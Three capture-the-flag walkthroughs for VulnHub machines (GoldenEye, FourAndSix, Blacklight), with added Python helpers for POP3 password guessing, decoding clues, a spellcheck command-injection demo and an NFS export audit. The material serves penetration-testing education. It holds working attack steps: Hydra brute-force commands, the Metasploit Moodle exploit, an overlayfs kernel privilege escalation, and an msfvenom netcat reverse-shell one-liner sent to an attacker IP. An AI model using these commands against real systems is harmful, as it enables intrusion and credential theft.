Hack the Golden Eye:1 (CTF Challenge)


Welcome to another boot2root CTF challenge, “GoldenEye”, uploaded by Creosote on VulnHub. The machine follows a theme, and you need to snag the flag to complete the challenge. You can download it from: https://www.vulnhub.com/entry/goldeneye-1,240/
This lab is confusing to begin with because the author gives very little description, but it needs a good variety of techniques to get root, with no exploit development or buffer overflows. So, on the basis of our experience and knowledge, we worked our way through the lab.
Level: Intermediate
Penetrating Methodologies:
§  Network scanning (Nmap)
§  Surfing the HTTP web service
§  Fetching an encoded password
§  Decoding (Burp Suite)
§  Brute-force (Hydra)
§  Connecting to POP3 (Netcat)
§  Extracting passwords from mail
§  Adding a domain name (/etc/hosts)
§  Exploring the domain name in the browser
§  Brute-force (Hydra)
§  Logging in to the server
§  Exploiting Moodle (Metasploit)
§  Kernel post-exploitation (overlayfs)
§  Capturing the flag

Let’s start
First and foremost we’ll scan the IP address with nmap. In my case, the IP address was 192.168.1.140.
nmap -p- -A 192.168.1.140 --open


Since port 80 was open, we explored the target IP in the web browser. Here we got a small clue, a login page at /sev-home/, as you can see in the image.




After that we checked the page source, which led us to another clue. Here we clicked on the link terminal.js as shown in the image.


Opening terminal.js put its code in front of us. Inside it, a comment gives two usernames (Boris, Natalya) and a password that is HTML-encoded, as shown in the image below.


We copied the encoded text and used Burp Suite's Decoder to turn the HTML-encoded text back into plain text, obtaining the password “InvincibleHack3r”.



Following the earlier clue, we browsed to 192.168.1.140/sev-home/ and logged in with the credentials we had just found. The page told us that a POP3 service is running, as shown in the image.


Earlier we had found ports 55006 and 55007 open for an unknown service, so we ran an nmap version scan against them and identified ssl/pop3 on 55006 and pop3 on 55007, along with their versions.


With two usernames in hand, we brute-forced each user's POP3 password with Hydra using the following command:

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3

We got the password secret1! for the username boris, as shown in the image.


hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3

We got the password bird for the username natalya, as shown in the image.


Using netcat we connected to the POP3 service and logged in with the username boris and password secret1!. This gave us three messages, as shown in the image.



We read all three messages, but the hints in them are red herrings placed to confuse you; we wasted some time trying to build a clue out of them.



Similarly, using netcat we logged in with the username natalya and password bird. This gave us two messages, as shown in the image.

nc 192.168.1.140 55007


After opening the messages we found several clues: a username and password, a domain name, and a directory on that domain.
Username: xenia
Password: RCP90rulez!
Domain name: severnaya-station.com
Server directory: /gnocertdir
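The Hydra run and the netcat login above are both just the POP3 USER/PASS exchange. The following added example (not code from the original write-up) shows both sides of that exchange in Python: a minimal in-process POP3 server with a constructed mailbox, a guess loop that tries candidate passwords one connection at a time (what Hydra does in parallel), and a client that lists and retrieves every message once authenticated, which is what we typed by hand over nc. The account, password and message contents are constructed for the example; against the real box you would point fetch_mail at the target IP and port 55007.

```python
import poplib
import socketserver
import threading

# Constructed mailbox: account -> (password, messages). Not the lab's real mail.
MAILBOX = {
    "boris": ("secret1!", [
        "From: natalya@ubuntu\r\nSubject: Welcome\r\n\r\nConstructed test message one.\r\n",
        "From: root@ubuntu\r\nSubject: Reminder\r\n\r\nConstructed test message two.\r\n",
    ]),
}


class Pop3Handler(socketserver.StreamRequestHandler):
    """Just enough POP3 (RFC 1939) for poplib: USER, PASS, LIST, RETR, QUIT."""

    def reply(self, text):
        self.wfile.write((text + "\r\n").encode("ascii"))

    def handle(self):
        self.reply("+OK POP3 ready")
        user, msgs = None, []
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            cmd, _, arg = raw.decode("ascii", "replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.reply("+OK")
            elif cmd == "PASS":  # only a matching USER/PASS pair unlocks the mailbox
                if user in MAILBOX and MAILBOX[user][0] == arg:
                    msgs = MAILBOX[user][1]
                    self.reply("+OK Logged in.")
                else:
                    self.reply("-ERR [AUTH] Authentication failed.")
            elif cmd == "LIST":
                self.reply("+OK %d messages:" % len(msgs))
                for i, m in enumerate(msgs, 1):
                    self.reply("%d %d" % (i, len(m)))
                self.reply(".")
            elif cmd == "RETR" and arg.isdigit() and 1 <= int(arg) <= len(msgs):
                body = msgs[int(arg) - 1]
                self.reply("+OK %d octets" % len(body))
                self.wfile.write(body.encode("ascii"))
                self.reply(".")
            elif cmd == "QUIT":
                self.reply("+OK Logging out.")
                return
            else:
                self.reply("-ERR unknown or invalid command")


def start_server():
    """Start the stub on an ephemeral localhost port; returns the port number."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), Pop3Handler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address[1]


def guess_password(host, port, user, candidates):
    """What Hydra does, serially: one USER/PASS attempt per connection.
    Returns the first password the server accepts, or None."""
    for pw in candidates:
        conn = poplib.POP3(host, port, timeout=5)
        try:
            conn.user(user)
            conn.pass_(pw)  # raises error_proto on an -ERR reply
            return pw
        except poplib.error_proto:
            pass
        finally:
            try:
                conn.quit()
            except (poplib.error_proto, OSError):
                pass  # some servers drop the socket after a failed login
    return None


def fetch_mail(host, port, user, password):
    """The manual nc session: USER, PASS, LIST, then RETR each message."""
    conn = poplib.POP3(host, port, timeout=5)
    try:
        conn.user(user)
        conn.pass_(password)
        _resp, listing, _octets = conn.list()
        return [b"\r\n".join(conn.retr(i)[1]).decode("ascii")
                for i in range(1, len(listing) + 1)]
    finally:
        conn.quit()


if __name__ == "__main__":
    port = start_server()
    found = guess_password("127.0.0.1", port, "boris", ["password", "123456", "secret1!"])
    print("password found:", found)
    for i, msg in enumerate(fetch_mail("127.0.0.1", port, "boris", found), 1):
        print("--- message %d ---\n%s" % (i, msg))
```

Each guess opens a fresh connection because POP3 servers commonly close the socket after a failed PASS; a real brute-force should also respect the per-connection delay Dovecot applies to failed logins, which is why Hydra's thread count matters more than raw speed here.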

From this point we added the server's IP along with the domain name to the Linux /etc/hosts file.


As you can see in the image, we added the domain name and the server's IP to /etc/hosts on our local machine and saved it.

Next we browsed to /gnocertdir on the domain name.
http://severnaya-station.com/gnocertdir
Ohhh!!! It was a GoldenEye welcome page built on the Moodle CMS, a hint we will use later.




After logging in with xenia's credentials and exploring the tabs on the page, we opened the message box and found a conversation between Xenia and Doak (another new user).





Then we used Hydra again to brute-force doak's POP3 password with the following command:
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3

We got the password goat for the username doak, as shown in the image.


Using netcat we logged in with the username doak and password goat. This gave us one message, which contained another username and password:
Username: dr_doak
Password: 4England!



We logged in to the Moodle site with the username dr_doak and password 4England!, as shown in the image. Exploring the tabs in the navigation section, we found a file s3cret.txt under My private files.



We downloaded s3cret.txt and read it with cat. It gave us the path of a JPG image.



We downloaded the image and ran strings on it, which revealed a base64-encoded line in its metadata; that made us curious to decode it.
wget http://severnaya-station.com/dir007key/for-007.jpg
strings for-007.jpg


echo {base64 encoded text} | base64 -d
This gave xWinter1995x! in plain text, which looked like it could be a password.
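Two of the clues so far were merely encoded, not encrypted: the password in terminal.js was HTML-encoded and the string inside for-007.jpg was base64. The following added helper (not part of the original write-up) does in Python what Burp Decoder and base64 -d did by hand: it pulls printable runs out of a binary the way strings does, then tries HTML character references, base64 and hex on each run, keeping only decodings that yield printable text. The fake JPEG bytes and the HTML-encoded string are constructed by encoding the passwords the write-up recovers; they are not the bytes of the lab's file.

```python
import base64
import binascii
import html
import re
import string

PRINTABLE = set(string.printable) - set("\x0b\x0c")


def is_printable(text):
    """True when every character is something a human would type."""
    return bool(text) and all(ch in PRINTABLE for ch in text)


def extract_strings(blob, min_len=4):
    """Same idea as `strings`: runs of printable ASCII at least min_len long."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def decode_candidates(token):
    """Try the encodings a CTF clue is usually wrapped in; return {scheme: plaintext}."""
    results = {}
    # HTML character references, e.g. &#73;&#110;... -> "In..." (what Burp Decoder did)
    if "&" in token:
        text = html.unescape(token)
        if text != token and is_printable(text):
            results["html"] = text
    # base64: only well-formed tokens, and only keep decodings that are printable text
    if len(token) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token):
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
            if is_printable(text):
                results["base64"] = text
        except (binascii.Error, UnicodeDecodeError):
            pass
    # hex: even length, hex digits only
    if re.fullmatch(r"(?:[0-9a-fA-F]{2})+", token):
        try:
            text = bytes.fromhex(token).decode("ascii")
            if is_printable(text):
                results["hex"] = text
        except UnicodeDecodeError:
            pass
    return results


def harvest(blob, min_len=8):
    """Strings in a binary that decode to readable text, as (scheme, token, plaintext)."""
    return [(scheme, token, text)
            for token in extract_strings(blob, min_len)
            for scheme, text in decode_candidates(token).items()]


# Constructed sample: JPEG SOI/APP0 header, a COM segment carrying the base64 of a
# password, non-printable filler and EOI. Built from "xWinter1995x!"; these are not
# the bytes of the lab's for-007.jpg.
SAMPLE_JPEG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xfe\x00\x16" + base64.b64encode(b"xWinter1995x!") + b"\x00"
    + bytes(range(0, 32)) + bytes(range(127, 256)) + b"\xff\xd9"
)
# Constructed sample shaped like the terminal.js comment: numeric character
# references generated from "InvincibleHack3r".
SAMPLE_HTML = "".join("&#%d;" % ord(c) for c in "InvincibleHack3r")

if __name__ == "__main__":
    print(decode_candidates(SAMPLE_HTML))
    for scheme, token, text in harvest(SAMPLE_JPEG):
        print("%s %s -> %s" % (scheme, token, text))
```

The printable-output filter is what keeps this useful on a real file: almost any alphanumeric run of a multiple of four characters is syntactically valid base64, so without it the tool would flood you with binary garbage decodings.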


Further exploring the site we had logged into led us to the TinyMCE HTML editor settings under the Plugins and Text editors tabs. Here we first selected Google Spell as the spell engine and saved the changes, but that got us nowhere, so we turned to Google for help.


Searching for a Moodle exploit, we found exploit 29324. Its description shows that the spell engine selected for TinyMCE has to be PSpellShell, as shown in the image, and it also gave us a clue for a new username: admin.




So, logged in as admin, we changed the spell engine to PSpellShell and saved the changes.



As the Metasploit module description puts it: Moodle allows an authenticated user to define spellcheck settings via the web interface (in practice the site administrator, which is why the admin credentials matter). The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. The module also allows an attacker to leverage another privilege-escalation vulnerability.
use exploit/multi/http/moodle_cmd_exec
msf exploit(moodle_cmd_exec) > set rhost severnaya-station.com
msf exploit(moodle_cmd_exec) > set targeturi /gnocertdir
msf exploit(moodle_cmd_exec) > set username admin
msf exploit(moodle_cmd_exec) > set password xWinter1995x!
Booom!!! We successfully got command shell session 1.
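To see why a configurable spellchecker path turns into command execution, here is an added illustration in Python (not Moodle's PHP and not the Metasploit module): a spellcheck handler that splices the administrator-configured aspell path into a shell command line, the flawed pattern behind this module, next to a hardened version that only accepts an allow-listed absolute path and runs it without a shell. The allow-list and the harmless "echo injected" marker standing in for the attacker's command are assumptions for the demo.

```python
import os
import shlex
import subprocess

# Assumed deployment allow-list for the hardened handler; adjust per host.
ALLOWED_SPELLERS = ("/usr/bin/aspell", "/usr/bin/hunspell")


def spellcheck_vulnerable(speller_path, text):
    """Flawed pattern: the admin-configurable binary path is pasted into a shell string.
    Whatever the setting contains is parsed by /bin/sh, so '; cmd' or 'cmd #' runs cmd
    as the web server user on every spellcheck request."""
    cmd = "echo %s | %s -a" % (shlex.quote(text), speller_path)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def spellcheck_hardened(speller_path, text, allowed=ALLOWED_SPELLERS):
    """Fix: treat the setting as an identifier, not a command line.
    Only an allow-listed, absolute, executable path is accepted, and it is exec'd
    directly (argv list, no shell) with the text supplied on stdin."""
    if speller_path not in allowed:
        raise ValueError("spellchecker %r is not an approved binary" % speller_path)
    if not (os.path.isabs(speller_path) and os.access(speller_path, os.X_OK)):
        raise FileNotFoundError(speller_path)
    proc = subprocess.run([speller_path, "-a"], input=text,
                          capture_output=True, text=True, check=False)
    return proc.stdout


if __name__ == "__main__":
    # The "path" an attacker saves in the admin UI. A harmless marker here; the
    # Metasploit module plants a reverse-shell command in the same place.
    evil = "echo injected #"
    print("vulnerable ->", spellcheck_vulnerable(evil, "hello").strip())
    try:
        spellcheck_hardened(evil, "hello")
    except ValueError as err:
        print("hardened   ->", err)
```

Note that the allow-list, not the absence of a shell, is what closes the hole: with a free-form path an attacker could still point the setting at any executable the web user can reach, so the setting must be constrained to known binaries rather than merely quoted.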


As we love meterpreter sessions, we upgraded it to a meterpreter shell:
sessions -u 1
Then sysinfo enumerated the kernel. The Linux version is 3.13, and a search for that version finds a local privilege-escalation exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation.



So we searched Kali's local copy of Exploit-DB for a kernel exploit matching Linux 3.13 and found exploit 37292.
searchsploit linux 3.13
Then we compiled it with gcc into a binary named shell in the /root directory.



We uploaded the compiled shell binary to the victim via meterpreter, used the Python one-liner to get a proper terminal, and ran the following commands:
python -c 'import pty;pty.spawn("/bin/bash")'
chmod 777 shell
./shell
Unfortunately it failed with an error: gcc not found.


The message says gcc is not installed on the target. It appears at run time rather than compile time because 37292.c shells out to gcc on the victim to build a small helper shared library before triggering the overlayfs bug. The target does have cc, a drop-in alternative, so we edited the original 37292.c and replaced gcc with cc in that command string, as shown in the image.



We then recompiled the modified exploit with cc:
cc 37292.c -o raj


We uploaded the new binary to the target, made it executable and ran it; this time it executed without any error.
upload /root/raj
chmod 777 raj
./raj
Yuppiee!! We got root access successfully!! 


Now let's finish the task by capturing the flag from flag.txt inside the /root directory.



Hacking the FourAndSix (CTF Challenge)



FourAndSix is a CTF challenge uploaded by Fred on vulnhub. You can download it from here.
The aim of this lab is to capture a flag in the root directory.
This lab is confusing to begin with because the author gives very little description. So, on the basis of our experience, we worked our way through the lab.
Steps involved:
1.      Port scanning and discovery of ports.
2.      Discovery of shared folder (misconfigured nfs).
3.      Mounting a directory to see the contents in the shared folder.
4.      Mounting and checking the root directory.
5.      Capturing the flag.
Let’s get started then!
First and foremost we’ll scan the IP address with nmap. In my case, the IP address was: 192.168.1.105.
nmap -A 192.168.1.105




We established from the scan that there is an nfs service running.

Network File System (NFS) lets a user on a client machine mount files or directories shared over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers; the NFS service itself listens on TCP/UDP port 2049, and rpcbind on port 111 tells clients where the other RPC services (such as mountd) live.
Let us check which directories the server exports and who is allowed to mount them:
showmount -e 192.168.1.105




We see that /shared is exported to everyone.
To check what is in the shared folder, we create a directory under /tmp and mount the export onto it.
cd /tmp
mkdir raj
mount -t nfs 192.168.1.105:/shared /tmp/raj
cd raj
ls
The mounted directory holds a disk image, USB-stick.img.





Let's mount this image file (mount treats a regular file as a loop device) to see what it contains.
mkdir usbstick
mount USB-stick.img usbstick
cd usbstick/
ls -la






But we obtained nothing useful at all.
Let's check whether the server's root filesystem is exported too.
mkdir main
mount 192.168.1.105:/ main
cd main
ls -la





Yes! The whole root filesystem is exported and we can browse it.
Let's move into the root user's home directory now.
cd root
ls –la

We see a text file called proof.txt!
cat proof.txt





Voila! We have obtained the flag! Happy hacking!
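Being able to mount / and read /root from our own root account means the export is world-mountable and, presumably (an assumption; the VM's /etc/exports is not shown above), does not squash root, so the client's uid 0 is the server's uid 0. The following added Python check, not part of the original write-up, parses /etc/exports-style lines and showmount -e output, flags those weak settings, and prints a tightened clause beside each weak one. The sample lines are constructed, not taken from the FourAndSix VM.

```python
import re

# Constructed sample lines; not the FourAndSix VM's real configuration.
SAMPLE_EXPORTS = """
# /etc/exports
/shared   *(rw,sync,no_root_squash,no_subtree_check)
/         *(ro,sync,no_root_squash,no_subtree_check)
/srv/data 192.168.1.0/24(ro,sync,root_squash,no_subtree_check)
"""

SAMPLE_SHOWMOUNT = """\
Export list for 192.168.1.105:
/shared (everyone)
/       (everyone)
/srv/data 192.168.1.0/24
"""

EXPORT_RE = re.compile(r"^(?P<path>\S+)\s+(?P<clients>.+)$")
CLIENT_RE = re.compile(r"(?P<host>[^\s(]+)(?:\((?P<opts>[^)]*)\))?")


def parse_exports(text):
    """Return (path, host, options) for every client clause of every export line."""
    out = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = EXPORT_RE.match(line)
        if not m:
            continue
        for c in CLIENT_RE.finditer(m.group("clients")):
            opts = [o.strip() for o in (c.group("opts") or "").split(",") if o.strip()]
            out.append((m.group("path"), c.group("host"), opts))
    return out


def audit_exports(text):
    """Return a list of (path, host, problems) for every weak client clause."""
    findings = []
    for path, host, opts in parse_exports(text):
        problems = []
        if host in ("*", "everyone"):
            problems.append("exported to the world: any client can mount it")
        if "no_root_squash" in opts:
            problems.append("no_root_squash: client root is server root, so /root and "
                            "SUID files are readable or writable")
        if path == "/":
            problems.append("exports the whole filesystem")
        if "rw" in opts and host in ("*", "everyone"):
            problems.append("world-writable: anyone can plant files or SUID binaries")
        if problems:
            findings.append((path, host, problems))
    return findings


def parse_showmount(text):
    """Return {path: client_spec} from `showmount -e` output; 'everyone' means wildcard."""
    exports = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 1)
        if len(parts) == 2:
            exports[parts[0]] = parts[1].strip("()")
    return exports


def harden(path, host, opts):
    """Suggest a tighter clause: no wildcard host, root squashed, read-only by default."""
    new_host = host if host not in ("*", "everyone") else "<client-subnet>"
    new_opts = [o for o in opts if o not in ("no_root_squash", "rw")]
    if "root_squash" not in new_opts:
        new_opts.append("root_squash")
    if "ro" not in new_opts:
        new_opts.append("ro")
    return "%s %s(%s)" % (path, new_host, ",".join(new_opts))


if __name__ == "__main__":
    remote = parse_showmount(SAMPLE_SHOWMOUNT)
    print("world-mountable per showmount:", [p for p, c in remote.items() if c == "everyone"])
    for path, host, problems in audit_exports(SAMPLE_EXPORTS):
        print("%s %s:" % (path, host))
        for p in problems:
            print("  -", p)
        opts = next(o for p2, h2, o in parse_exports(SAMPLE_EXPORTS) if (p2, h2) == (path, host))
        print("  fix:", harden(path, host, opts))
```

The showmount parser only tells you what is mountable; whether a client's root is squashed is invisible from outside, which is why, during a test, actually mounting and trying to read /root (as done above) is the definitive check.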

Hacking the Blacklight: 1 (CTF Challenge)


Hello everyone. In this article we'll be hacking a new lab, Blacklight. The goal of the lab is to capture 2 flags. It was made by Carter B (downloadable from here) and, after a lot of brainstorming, we present a really efficient method to get root and capture the flags.

Steps involved:
1.      Network discovery and port scan
2.      Directory busting the server
3.      Accessing robots.txt on the webpage
4.      Capturing flag 1 from robots.txt and discovery of a new port 9072
5.      Connection to port 9072 to upload a netcat reverse shell
6.      Getting root access and capturing second flag
Let’s get started then.
First and foremost, we’ll discover the IP address of the lab. In my case, the IP is 192.168.1.102




Let's scan all the open ports with nmap. A default scan only probes the 1000 most common ports and might miss some, so we scan the full range:
nmap -p- -A 192.168.1.102 --open




We discovered that port 80 is open. So there must be a webpage associated with it. Let’s move towards our browser and check the website.




There seems to be nothing interesting here! But wait... maybe there are directories with something valuable for us. Let's run a directory brute-force against the web server:
dirb http://192.168.1.102/




dirb found robots.txt, which often lists paths the site owner would rather we did not see. Let's open it in the browser.




Boom! There it is! Our very first flag. Let’s see what’s in there.




flag1 is a hash. The next flag is unknown, but the second line of this file says 9072, so it has something to do with port 9072, and “the secret is at home” means the next flag is under a home directory. To read it we will have to get onto the box, ideally as root.
There is another dictionary file present here but the current use of it is unknown.
Holding that thought, let’s go ahead and try connecting to port 9072 with telnet.



We successfully connected to a console, but the author has built in a restriction: we cannot execute more than 2 commands in it. As soon as we hit the second command the server quits and the listener will not accept another connection.
So the first command we type is .help, which lists what we can do:
.readhash
.exec
.quit
The obvious choice was .readhash, but that is another red herring: it is of no use, just like the dictionary listed in robots.txt.
Now we generate a netcat reverse-shell command with msfvenom and run it through the console:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.120 lport=4444 R




Copy the raw command it prints:
mkfifo /tmp/cdbe; nc 192.168.1.120 4444 0</tmp/cdbe | /bin/sh >/tmp/cdbe 2>&1; rm /tmp/cdbe
We paste this into the Blacklight console using the .exec command:
.exec mkfifo /tmp/cdbe; nc 192.168.1.120 4444 0</tmp/cdbe | /bin/sh >/tmp/cdbe 2>&1; rm /tmp/cdbe



A peculiarity of this console is that it never shows a command's output; everything runs in the background and you would have to dump the output yourself. With a reverse shell we do not need to.
Before sending the .exec, set up a netcat listener on port 4444 to catch the payload's connection.




AND WE HAVE A CONNECTION!
whoami
tells us we are root.
But this is not a proper shell. Let us spawn a pty shell using the Python one-liner:
python -c 'import pty;pty.spawn("/bin/bash")'
And we have a proper shell now!
Remember what flag1.txt told us? The secret is at home!
cd /home
ls
cd blacklight
ls

We found a text file called hash.txt!
cat hash.txt



We examined blacklight's home directory once more, this time listing hidden entries, and found a directory called .secret. Remember that flag1.txt said the secret is at home? Let's check what is inside .secret.

cd /home
cd blacklight
ls -la
cd .secret

It contains an image file called flag2-inside.jpg.

The file name tells us the flag is inside this image. So we copy it into /var/www/html to fetch it through the web server.

cp flag2-inside.jpg /var/www/html



Let's open it through the web page now.
Hmmm... why are those two words capitalized?
Wait! There is a steganography tool called OutGuess!


Let's download the image to the Desktop and use outguess to retrieve the hidden flag into a file called flag2.txt:

./outguess -r /root/Desktop/flag2-inside.jpg -t flag2.txt
cat flag2.txt


Finally! We obtained the second flag! Happy Hacking!